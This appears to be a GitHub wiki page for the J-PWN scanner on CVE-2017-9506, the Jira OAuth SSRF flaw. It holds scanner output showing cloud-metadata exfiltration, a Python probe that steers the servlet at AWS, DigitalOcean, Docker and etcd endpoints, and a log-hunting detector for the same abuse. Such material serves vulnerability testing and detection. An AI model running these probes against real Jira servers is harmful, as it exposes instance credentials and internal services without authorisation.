CVE-2017-9506 - carnal0wnage/J-PWN GitHub Wiki
CVE-2017-9506
Category: [SSRF]
module name: check_cve_2017_9506
url: /plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
INFO: Checking for CVE-2017-9506 (SSRF)
[Testing URL]: https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
[+] [SSRF] Vulnerable to CVE-2017-9506 (SSRF): https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
Checking AWS Metadata
----> AWS Metadata Found: https://JIRASERVER/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/
Checking Alibaba Metadata
----> Alibaba Metadata Not Found
- HTTP Code: 500
Checking Docker Containers
----> Docker Containers Not Found
- HTTP Code: 500
Checking Kubernetes ETCD API keys
----> Kubernetes ETCD API keys Not Found
- HTTP Code: 500
Exfiltrated data written to: loot/CVE-2017-9506_1.2.3.4.txt
INFO: Checking for CVE-2017-9506 (SSRF)
[Testing URL]: http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
[!!] [SSRF] Vulnerable to CVE-2017-9506 (SSRF): http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
Checking AWS Metadata
----> AWS Metadata Not Found
----> HTTP Code: 500
Checking Alibaba Metadata
----> Alibaba Metadata Not Found
----> HTTP Code: 500
Checking Docker Containers
----> Docker Containers Not Found
----> HTTP Code: 500
Checking Kubernetes ETCD API keys
----> Kubernetes ETCD API keys Not Found
----> HTTP Code: 500
Checking Digital Ocean Metadata
----> Digital Ocean Metadata Found: http://10.10.10.10:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1.json
Checking Oracle Cloud
----> Oracle Cloud Not Found
----> HTTP Code: 500
Exfiltrated data written to: loot/CVE-2017-9506_10.10.10.10:8080.txt
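The runs above follow one pattern: confirm the proxy with a canary URL (https://google.com), then steer it at cloud metadata and local API endpoints and treat an HTTP 200 with a body as a hit and a 500 as unreachable. The following is an added example of that logic, not J-PWN's own code. The fetcher is injected so it can run offline against a constructed fake; the endpoint list beyond the AWS and DigitalOcean URLs shown above is an assumption (well-known addresses, not necessarily what J-PWN probes), and `fake_fetch` returns made-up responses.

```python
"""Added example (not J-PWN's code): the shape of a CVE-2017-9506 check.

The icon-uri servlet fetches whatever `consumerUri` points at and returns the
body, so the check is: confirm the proxy with a canary URL, then point it at
cloud metadata / local API endpoints and see which answer with HTTP 200.
"""
from urllib.parse import parse_qs, quote, urlsplit

ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"

# Well-known metadata / local API endpoints. Assumption: the list J-PWN itself
# probes may differ; only the AWS and DigitalOcean URLs appear in the output above.
METADATA_TARGETS = {
    "AWS Metadata": "http://169.254.169.254/latest/meta-data/",
    "Alibaba Metadata": "http://100.100.100.200/latest/meta-data/",
    "Docker Containers": "http://127.0.0.1:2375/containers/json",
    "Kubernetes ETCD API keys": "http://127.0.0.1:2379/v2/keys/?recursive=true",
    "Digital Ocean Metadata": "http://169.254.169.254/metadata/v1.json",
    "Oracle Cloud": "http://169.254.169.254/opc/v1/instance/",
}


def build_probe(base_url, target):
    """URL that asks the Jira server to fetch `target` on our behalf."""
    return f"{base_url.rstrip('/')}{ICON_URI_PATH}?consumerUri={quote(target, safe='')}"


def run_checks(base_url, fetch, canary="https://google.com", canary_marker="google"):
    """Run the canary check, then the metadata probes.

    `fetch(url) -> (status_code, body_text)` is injected so the same logic can
    be driven by `requests` against a real host or by a fake for offline use.
    Returns {"vulnerable": bool, <target name>: (found, status), ...}.
    """
    status, body = fetch(build_probe(base_url, canary))
    results = {"vulnerable": status == 200 and canary_marker in body.lower()}
    if not results["vulnerable"]:
        return results          # no point probing metadata through a dead proxy
    for name, target in METADATA_TARGETS.items():
        status, body = fetch(build_probe(base_url, target))
        # The output above shows unreachable targets come back as HTTP 500.
        results[name] = (status == 200 and bool(body.strip()), status)
    return results


def fake_fetch(url):
    """Constructed responses imitating a vulnerable Jira on an EC2 host (not real data)."""
    target = parse_qs(urlsplit(url).query).get("consumerUri", [""])[0]
    if target == "https://google.com":
        return 200, "<html><head><title>Google</title></head></html>"
    if target.startswith("http://169.254.169.254/latest/meta-data/"):
        return 200, "ami-id\nhostname\niam/\ninstance-id\n"
    return 500, ""


if __name__ == "__main__":
    report = run_checks("https://JIRASERVER", fake_fetch)
    for name, value in report.items():
        print(f"{name}: {value}")
```

Swapping `fake_fetch` for a wrapper around `requests.get` (with a timeout and `verify` set per engagement) turns this into a live check; the rest of the logic is unchanged.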
References
The version of the bundled Atlassian OAuth plugin was vulnerable to Server Side Request Forgery (SSRF). This allowed an XSS and/or an SSRF attack to be performed. For more information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344. When running in an environment like Amazon EC2, this flaw can be used to access a metadata resource that provides access credentials and other potentially confidential information.
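Because exploitation is a plain GET to a fixed servlet path, the attack leaves a clear trace in the web server's access log. The following is an added example, not J-PWN's or Atlassian's code, of hunting for it: every icon-uri request is reported, and those whose consumerUri points at a loopback, link-local or otherwise non-global address (the metadata case the paragraph above describes) are flagged as internal. The log lines are constructed for the example, the hostname list is an assumption, and the log format is assumed to be Apache/nginx "combined".

```python
"""Added example (not J-PWN's or Atlassian's code): hunting CVE-2017-9506 abuse
in web access logs.

Any hit on the icon-uri servlet whose consumerUri points at a loopback,
link-local or otherwise non-global address is the SSRF being steered at
metadata or local services; requests with a public target are worth a look
too, since scanners confirm the flaw with a canary such as https://google.com.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"

# Apache/nginx "combined" access-log format (assumption about the log source).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: hostnames that resolve to metadata services in common clouds.
METADATA_HOSTNAMES = {"localhost", "metadata", "metadata.google.internal"}


def consumer_uri_target(request_path):
    """Return the decoded consumerUri of an icon-uri request, else None."""
    parts = urlsplit(request_path)
    if parts.path != ICON_URI_PATH:
        return None
    values = parse_qs(parts.query).get("consumerUri")
    return values[0] if values else None


def is_internal_target(target):
    """True if the host the server was made to fetch is not a public address."""
    host = urlsplit(target).hostname
    if host is None:
        return True                       # unparsable target: treat as hostile
    if host in METADATA_HOSTNAMES:
        return True
    try:
        # is_global is False for RFC1918, loopback, link-local and 100.64.0.0/10
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False                      # a DNS name we cannot resolve offline


def scan_log(lines):
    """One finding per icon-uri request: source, target, status, internal flag."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = consumer_uri_target(m["path"])
        if target is None:
            continue
        findings.append({
            "src": m["src"],
            "target": target,
            "status": int(m["status"]),
            "internal": is_internal_target(target),
        })
    return findings


# Constructed log lines (not from a real incident).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2019:12:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jun/2019:12:00:02 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 233',
    '203.0.113.7 - - [10/Jun/2019:12:00:03 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F127.0.0.1%3A2375%2Fcontainers%2Fjson HTTP/1.1" 500 0',
    '203.0.113.7 - - [10/Jun/2019:12:00:04 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://100.100.100.200/latest/meta-data/ HTTP/1.1" 500 0',
    '198.51.100.4 - - [10/Jun/2019:12:00:05 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "INTERNAL" if f["internal"] else "external"
        print(f'{f["src"]} -> {f["target"]} [{f["status"]}] {flag}')
```

A 200 on an internal target (the second line) is the one to treat as a confirmed credential exposure and rotate the instance role's keys; the 500s still show the attacker enumerating, and a burst of them from one source right after a google.com canary is the scanner signature.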